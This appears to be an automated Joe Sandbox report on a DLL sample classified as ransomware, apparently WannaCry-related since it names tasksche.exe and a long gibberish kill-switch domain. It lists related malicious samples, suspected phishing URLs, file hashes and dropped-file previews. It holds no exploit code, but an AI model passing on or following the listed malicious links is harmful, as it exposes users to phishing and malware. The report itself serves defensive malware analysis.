                                                                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                                                                              Analysis ID:672008
                                                                                                                              Start date and time: 23/07/202201:43:072022-07-23 01:43:07 +02:00
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 12m 39s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Sample file name:y2jb4FtSNq (renamed file extension from none to dll)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:23
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:18
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.rans.troj.evad.winDLL@29/11@24/3
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 75%
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 39.6% (good quality ratio 36%)
                                                                                                                              • Quality average: 77.2%
                                                                                                                              • Quality standard deviation: 32.3%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 78%
                                                                                                                              • Number of executed functions: 17
                                                                                                                              • Number of non-executed functions: 84
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              • Override analysis time to 240s for rundll32

                                                                                                                              Warnings

                                                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.40.136.238, 23.211.6.115, 23.211.4.86, 20.82.210.154, 20.82.209.183
                                                                                                                              • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, rjirxk.com, fs-wildcard.microsoft.com.edgekey.net, wufhfo.com, cudiqm.com, veqbbn.com, www.bing.com, wnzgoe.com, smezbn.com, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, wlnmvm.com, bnwzie.com, uaqjzn.com, eymtmi.com, mbxpjh.com, btkcso.com, ris.api.iris.microsoft.com, pangeq.com, qmimjr.com, olieyo.com, aoulrr.com, vgemhe.com, uatacq.com, eeauou.com, aaeyfv.com, pnuoyg.com, iireby.com, e12564.dspb.akamaiedge.net, go.microsoft.com, qtnarp.com, fudevu.com, qmehuz.com, cixudc.com, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, exevye.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ant.trenz.pl, iooaeg.com, lcogil.com, pxunuy.com, lugaup.com, youdqa.com, rffriz.com, boziev.com, seyuei.com, cerbyj.com, zyjedf.com, niongj.com, ahanjw.com, login.live.com, atvhio.com, watson.telemetry.microsoft.com, kuwazq.com, uyjpue.com, fs.microsoft.com, chlntf.com, clpivo.com, jiarfr.com, vwfgt
                                                                                                                              • Execution Graph export aborted for target tasksche.exe, PID 3780 because there are no executed function
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              01:44:19API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                                              01:44:47API Interceptor3x Sleep call for process: svchost.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              104.16.173.80KzTwbZkCyW.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              mAgMRXeHnV.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              u25HmIWOKl.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              JnqM1TFtYi.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              5hHHsExlwx.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              XHlAv3DhlB.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              VzAh2pC8hQ.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              MSmReFKunQ.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              bdXynoRgnV.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              NXE94LoM7v.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              p2zzIwIYiq.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              Liw5SS6our.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              kvkcvyw5oX.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              hkOMcMvb1g.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              pVq0MV4s45.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              uQfVWYzSkC.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              oEPKuvzhOV.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              TigrxMihsc.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              ldmAEqI3Cz.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                                                                              7qaVQr9tBi.dllGet hashmaliciousBrowse
                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comHhDMZKWBi5.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              KzTwbZkCyW.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              mAgMRXeHnV.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              giXSx7co4Z.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              u25HmIWOKl.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              JnqM1TFtYi.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              7Qu8thR7WW.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              Kq8sxCCgnb.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              5hHHsExlwx.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              XHlAv3DhlB.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              IlpKomTIie.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              VzAh2pC8hQ.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              MSmReFKunQ.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              bdXynoRgnV.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              NXE94LoM7v.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              p2zzIwIYiq.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              Z5aCnP2H7Z.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              Liw5SS6our.dllGet hashmaliciousBrowse
                                                                                                                              • 104.16.173.80
                                                                                                                              kvkcvyw5oX.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              dlMW8hjgjP.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              CLOUDFLARENETUSzePuRkS1Xn.dllGet hashmaliciousBrowse
                                                                                                                              • 172.67.34.170
                                                                                                                              https://houseinspector.8b.ioGet hashmaliciousBrowse
                                                                                                                              • 104.18.11.207
                                                                                                                              http://trk.klclick3.com/ls/click?upn=Ji4TiwFf9C8KZa7AUkLef4lH8yUzvhj-2FN28bg-2FRjY-2FdygBYb-2FMR9VWVahh6stwCB6PdVy1ZaS5mv8zdj3dphabFYR7M365jBDN-2BStcnq9DNnyMS3z1LhYOJI-2BVhJyeKkEtGy6u3HGx0Z2G-2Fw7TkbmkXlQcEINe4XcrX9-2FPXFTQcp7X3qwNeJTLVwl4vlxX3e7u3WOc9yRUy0-2F8ieVVTK-2B7D2-2BPiYlNMQ10AFH8pSh26-2BzF-2BMmdav5o4YHt44f-2By3NIVcKzAtKyGNuqRldj3AzA-3D-3DT-ik_ljzEBGrrK0qZqc4J-2BeoFliRHcBhjtmZA1jHS-2Bpcs9rPq7kOK-2FC-2FRcIzt-2Fdhhb-2F6rep3-2F1jF3L6QMr2JXq2mz5-2F4ZqpfkPgBAS8rAvSsWJqfl1UiIPy3SqagA6su-2FFukL3dSsymQnSOQpXet3hnjJf91E-2FvK-2BmMVzbgBFMj2KVh16nCEmG6Y2iUBcE-2B-2BuiA2OxEBRdDht03JFiKIDzrqM3AvTNB5wWjQ4KlCuclj5pmNJjP13zdYgU5EA6haENsH14wheWPrsFvx1c0zpqezW3zfvP8Safnmk-2FiDrCcNdgxhD49x-2FSxWRJPhUl6sBq2TRZs7eyQ8sdlJZXPt1TUB8wWc0AgsoHvVx0sdbzCGKaxqByHoB6Il5o-2Fnoyr757znlPs7ug-2BMHKVJPWuJbyLEk5A-3D-3DGet hashmaliciousBrowse
                                                                                                                              • 104.17.24.14
                                                                                                                              hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                                                              • 104.18.115.97
                                                                                                                              Info-Relev#U00e9-fiscal.vbsGet hashmaliciousBrowse
                                                                                                                              • 104.18.28.213
                                                                                                                              Info-Releve-fiscal.vbsGet hashmaliciousBrowse
                                                                                                                              • 104.18.28.213
                                                                                                                              Scan Document.PDF.exeGet hashmaliciousBrowse
                                                                                                                              • 162.159.129.233
                                                                                                                              Rooming list Associados Grupo Nacionalinn.pdf.batGet hashmaliciousBrowse
                                                                                                                              • 172.66.40.175
                                                                                                                              f.batGet hashmaliciousBrowse
                                                                                                                              • 104.16.148.64
                                                                                                                              treyner-dlya-x-com-u_Jp2al5dm.exeGet hashmaliciousBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              HhDMZKWBi5.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              treyner-dlya-x-com-u_Jp2al5dm.exeGet hashmaliciousBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              https://insightsitcdelivery.com/knowbe4-9665-64068/unsubscribe/LDZP83cKArYqcCmP4whZcyX4LUTdGet hashmaliciousBrowse
                                                                                                                              • 104.17.25.14
                                                                                                                              https://insightsitcdelivery.com/knowbe4-9665-64068/56742?uid=LDZP83cKArYqcCmP4whZcyX4LUTd&prom_type=regular&prom_id=181750&pld=26L81sNgpwNGbfGet hashmaliciousBrowse
                                                                                                                              • 104.26.10.16
                                                                                                                              http://bikehike.orgGet hashmaliciousBrowse
                                                                                                                              • 104.18.3.114
                                                                                                                              https://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Flinkprotect.cudasvc.com%2Furl%3Fa%3Dhttps%253a%252f%252fapp.box.com%252fs%252fo29wsp0z3edbibb2pphpqfx7nb5m2yx7%26c%3DE,1,cyBXh8kJkb3lnygeGJ58e4w29wV7FH_a0ltZH1VwoGOSRLdWvQLHUv7qcxtM6n7vFB5nyUv1A-P8jmWzAzFPg49JHwbBUVwAhqjjw3azwXM,%26typo%3D1&E=mobilebanking%40woodlandsbank.com&X=XID687AgsPUp2755Xd3&T=WDLP&HV=U,E,X,T&H=3827417279ae1b70fc9534216b552819c3b7a8caGet hashmaliciousBrowse
                                                                                                                              • 104.18.11.207
                                                                                                                              KzTwbZkCyW.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              https://kalinvites.com/invitations/private/60lRnfdQf5A/z_gsPCHvE-Y?pos=linkGet hashmaliciousBrowse
                                                                                                                              • 104.18.37.246
                                                                                                                              http://mids4d.co.ukGet hashmaliciousBrowse
                                                                                                                              • 104.16.148.64
                                                                                                                              https://locksmithelpasotexas.com/wp-content/plugins/mqdrxkc/2Factor.html#YnJpYW4ud2lsbGlhbXNAa3JhZnRtYWlkLmNvbQ==&target=_blankGet hashmaliciousBrowse
                                                                                                                              • 104.21.84.241
                                                                                                                              CLOUDFLARENETUSzePuRkS1Xn.dllGet hashmaliciousBrowse
                                                                                                                              • 172.67.34.170
                                                                                                                              https://houseinspector.8b.ioGet hashmaliciousBrowse
                                                                                                                              • 104.18.11.207
                                                                                                                              http://trk.klclick3.com/ls/click?upn=Ji4TiwFf9C8KZa7AUkLef4lH8yUzvhj-2FN28bg-2FRjY-2FdygBYb-2FMR9VWVahh6stwCB6PdVy1ZaS5mv8zdj3dphabFYR7M365jBDN-2BStcnq9DNnyMS3z1LhYOJI-2BVhJyeKkEtGy6u3HGx0Z2G-2Fw7TkbmkXlQcEINe4XcrX9-2FPXFTQcp7X3qwNeJTLVwl4vlxX3e7u3WOc9yRUy0-2F8ieVVTK-2B7D2-2BPiYlNMQ10AFH8pSh26-2BzF-2BMmdav5o4YHt44f-2By3NIVcKzAtKyGNuqRldj3AzA-3D-3DT-ik_ljzEBGrrK0qZqc4J-2BeoFliRHcBhjtmZA1jHS-2Bpcs9rPq7kOK-2FC-2FRcIzt-2Fdhhb-2F6rep3-2F1jF3L6QMr2JXq2mz5-2F4ZqpfkPgBAS8rAvSsWJqfl1UiIPy3SqagA6su-2FFukL3dSsymQnSOQpXet3hnjJf91E-2FvK-2BmMVzbgBFMj2KVh16nCEmG6Y2iUBcE-2B-2BuiA2OxEBRdDht03JFiKIDzrqM3AvTNB5wWjQ4KlCuclj5pmNJjP13zdYgU5EA6haENsH14wheWPrsFvx1c0zpqezW3zfvP8Safnmk-2FiDrCcNdgxhD49x-2FSxWRJPhUl6sBq2TRZs7eyQ8sdlJZXPt1TUB8wWc0AgsoHvVx0sdbzCGKaxqByHoB6Il5o-2Fnoyr757znlPs7ug-2BMHKVJPWuJbyLEk5A-3D-3DGet hashmaliciousBrowse
                                                                                                                              • 104.17.24.14
                                                                                                                              hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                                                              • 104.18.115.97
                                                                                                                              Info-Relev#U00e9-fiscal.vbsGet hashmaliciousBrowse
                                                                                                                              • 104.18.28.213
                                                                                                                              Info-Releve-fiscal.vbsGet hashmaliciousBrowse
                                                                                                                              • 104.18.28.213
                                                                                                                              Scan Document.PDF.exeGet hashmaliciousBrowse
                                                                                                                              • 162.159.129.233
                                                                                                                              Rooming list Associados Grupo Nacionalinn.pdf.batGet hashmaliciousBrowse
                                                                                                                              • 172.66.40.175
                                                                                                                              f.batGet hashmaliciousBrowse
                                                                                                                              • 104.16.148.64
                                                                                                                              treyner-dlya-x-com-u_Jp2al5dm.exeGet hashmaliciousBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              HhDMZKWBi5.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              treyner-dlya-x-com-u_Jp2al5dm.exeGet hashmaliciousBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              https://insightsitcdelivery.com/knowbe4-9665-64068/unsubscribe/LDZP83cKArYqcCmP4whZcyX4LUTdGet hashmaliciousBrowse
                                                                                                                              • 104.17.25.14
                                                                                                                              https://insightsitcdelivery.com/knowbe4-9665-64068/56742?uid=LDZP83cKArYqcCmP4whZcyX4LUTd&prom_type=regular&prom_id=181750&pld=26L81sNgpwNGbfGet hashmaliciousBrowse
                                                                                                                              • 104.26.10.16
                                                                                                                              http://bikehike.orgGet hashmaliciousBrowse
                                                                                                                              • 104.18.3.114
                                                                                                                              https://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Flinkprotect.cudasvc.com%2Furl%3Fa%3Dhttps%253a%252f%252fapp.box.com%252fs%252fo29wsp0z3edbibb2pphpqfx7nb5m2yx7%26c%3DE,1,cyBXh8kJkb3lnygeGJ58e4w29wV7FH_a0ltZH1VwoGOSRLdWvQLHUv7qcxtM6n7vFB5nyUv1A-P8jmWzAzFPg49JHwbBUVwAhqjjw3azwXM,%26typo%3D1&E=mobilebanking%40woodlandsbank.com&X=XID687AgsPUp2755Xd3&T=WDLP&HV=U,E,X,T&H=3827417279ae1b70fc9534216b552819c3b7a8caGet hashmaliciousBrowse
                                                                                                                              • 104.18.11.207
                                                                                                                              KzTwbZkCyW.dllGet hashmaliciousBrowse
                                                                                                                              • 104.17.244.81
                                                                                                                              https://kalinvites.com/invitations/private/60lRnfdQf5A/z_gsPCHvE-Y?pos=linkGet hashmaliciousBrowse
                                                                                                                              • 104.18.37.246
                                                                                                                              http://mids4d.co.ukGet hashmaliciousBrowse
                                                                                                                              • 104.16.148.64
                                                                                                                              https://locksmithelpasotexas.com/wp-content/plugins/mqdrxkc/2Factor.html#YnJpYW4ud2lsbGlhbXNAa3JhZnRtYWlkLmNvbQ==&target=_blankGet hashmaliciousBrowse
                                                                                                                              • 104.21.84.241

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              C:\Windows\tasksche.exe7B6t4L7E2o.dllGet hashmaliciousBrowse
                                                                                                                                4GDffePnzH.dllGet hashmaliciousBrowse
                                                                                                                                  HFKDS6VcNO.dllGet hashmaliciousBrowse
                                                                                                                                    FjYNZSPNkt.dllGet hashmaliciousBrowse
                                                                                                                                      kBBdc7Aoj4.dllGet hashmaliciousBrowse
                                                                                                                                        tct5NKwZY8.dllGet hashmaliciousBrowse
                                                                                                                                          7KPQg3aXdC.dllGet hashmaliciousBrowse
                                                                                                                                            ngFFOGiE7Y.dllGet hashmaliciousBrowse

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8192
                                                                                                                                              Entropy (8bit):0.3593198815979092
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                              MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                              SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                              SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                              SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:MPEG-4 LOAS
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310720
                                                                                                                                              Entropy (8bit):0.24945325358406642
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4hdm:BJiRdwfu2SRU4hdm
                                                                                                                                              MD5:17B3A2BF09EDB31C2D25BC8F7A27AFB2
                                                                                                                                              SHA1:24E89A876E93B3A9996890D456865BABF10CB574
                                                                                                                                              SHA-256:FDEEADF1F6724F3D657FF3670521EEEB86E5096E16D90DAA8E458CF5434C834C
                                                                                                                                              SHA-512:6AE93B0F7536C7437BE4B6D41AC8C983FC21D7D34BD3585020C1A20F0FC69C4705BC374DDAFDBA1E60B3CE8F966F6278E878509591EAC589A38F5F848DFF17B8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdd0e993c, page size 16384, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):786432
                                                                                                                                              Entropy (8bit):0.2507045304539694
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:dLG+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:dLpSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                              MD5:DF0411E97ED961C261CAD11CCB2EFF3A
                                                                                                                                              SHA1:56DD03A42715C758957022BAA66DFA5209BD2758
                                                                                                                                              SHA-256:BAEB4116358571C5CA4637DED560AC60937ADD48966435952CA0CC37E026E725
                                                                                                                                              SHA-512:9B106A288841C6DFA919638810CE0FAD48ADEC1E43DE7FD014DA3646406B3DE9B28A6EF841A896F03B95951B64BB233CDB81774A1887D16B81935B874684168B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...<... ................e.f.3...w........................).....:/...z..0,...z..h.(.....:/...z....)..............3...w...........................................................................................................B...........@...................................................................................................... .....................................................................................................................................................................................................................................................G.:/...z..................UZcS:/...z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.0770467428783165
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:XD7vVOiOEtyilbMqnHtxlll3Vkttlmlnl:zrbtxl7Hf3
                                                                                                                                              MD5:9A440ADD24A8174BAD1B8053A0CDF426
                                                                                                                                              SHA1:B6C2D6268EC348E512CEFC23DC7312EE8483CDB1
                                                                                                                                              SHA-256:5AB255A3ED2EFCA55B5BA8946E0F8B34D389669023017DC16F10F9D67346FEB2
                                                                                                                                              SHA-512:19A8DEA83E0A51B581FB1723354385EF2CEE746D188DEA3172FA459E9030C8F52825B9B2B3C33F8AA13E9CA40BAEEFC35698CAB2315DEE6D9729A62EDC6AC0C0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..8E.....................................3...w..0,...z..:/...z..........:/...z..:/...z..c..:/...z.{................UZcS:/...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\1658565894 (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6094
                                                                                                                                              Entropy (8bit):3.832911797157349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyggwUwTBwk4brj6XgUwTBNYDBUs8k0s7MRFnwFDBc:Lv44wFyg8wTt4XmXhwT1s8k0pRK5G
                                                                                                                                              MD5:8D14E457703F2D6A144D6883BAAF9C42
                                                                                                                                              SHA1:783F38A8D699D64341A96261ABBADFCB16DEC793
                                                                                                                                              SHA-256:09A6C39985AB7184CCF41746CBE4ED4B99F035C6C5DCF597C40CEDD5BA4F914C
                                                                                                                                              SHA-512:DF5395ADC8A53CBEFC25F0BB9271056D5F11903EF5EE39467E643A5E5336142E9B0D77EA902570C9CDB7B75D895E73A85C49C2677CB2012539D7435B427B4910
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..{.".b.a.t.c.h.r.s.p.".:.{.".v.e.r.".:.".1...0.".,.".i.t.e.m.s.".:.[.{.".i.t.e.m.".:.".{.\.".f.\.".:.\.".r.a.f.\.".,.\.".v.\.".:.\.".1...0.\.".,.\.".r.d.r.\.".:.[.{.\.".c.\.".:.\.".C.D.M.\.".,.\.".u.\.".:.\.".S.u.b.s.c.r.i.b.e.d.C.o.n.t.e.n.t.\.".}.].,.\.".a.d.\.".:.{.\.".c.l.a.s.s.\.".:.\.".c.o.n.t.e.n.t.\.".,.\.".c.o.l.l.e.c.t.i.o.n.s.\.".:.[.].,.\.".i.t.e.m.P.r.o.p.e.r.t.y.M.a.n.i.f.e.s.t.\.".:.{.\.".n.o.O.p.\.".:.{.\.".t.y.p.e.\.".:.\.".a.c.t.i.o.n.\.".}.}.,.\.".i.t.e.m.s.\.".:.[.{.\.".p.r.o.p.e.r.t.i.e.s.\.".:.{.\.".n.o.O.p.\.".:.{.\.".e.v.e.n.t.\.".:.\.".n.o.n.e.\.".,.\.".p.a.r.a.m.e.t.e.r.s.\.".:.{.}.,.\.".a.c.t.i.o.n.\.".:.\.".n.o.O.p.\.".}.}.,.\.".t.r.a.c.k.i.n.g.\.".:.{.\.".e.v.e.n.t.s.\.".:.[.{.\.".i.d.\.".:.\.".i.m.p.r.e.s.s.i.o.n.\.".}.].,.\.".p.a.r.a.m.e.t.e.r.i.z.e.d.\.".:.[.{.\.".u.r.i.\.".:.\.".h.t.t.p.s.:.\./.\./.r.i.s...a.p.i...i.r.i.s...m.i.c.r.o.s.o.f.t...c.o.m.\./.v.1.\./.a.\./.{.A.C.T.I.O.N.}.?.C.I.D.=.1.2.8.0.0.0.0.0.0.0.0.1.6.2.7.4.0.9.&.r.e.g.i.o.n.=.U.S.&.l.

                                                                                                                                              C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\1658565894.~tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6094
                                                                                                                                              Entropy (8bit):3.832911797157349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:LcTcgyaWbk4btWfdyggwUwTBwk4brj6XgUwTBNYDBUs8k0s7MRFnwFDBc:Lv44wFyg8wTt4XmXhwT1s8k0pRK5G
                                                                                                                                              MD5:8D14E457703F2D6A144D6883BAAF9C42
                                                                                                                                              SHA1:783F38A8D699D64341A96261ABBADFCB16DEC793
                                                                                                                                              SHA-256:09A6C39985AB7184CCF41746CBE4ED4B99F035C6C5DCF597C40CEDD5BA4F914C
                                                                                                                                              SHA-512:DF5395ADC8A53CBEFC25F0BB9271056D5F11903EF5EE39467E643A5E5336142E9B0D77EA902570C9CDB7B75D895E73A85C49C2677CB2012539D7435B427B4910
                                                                                                                                              Malicious:false
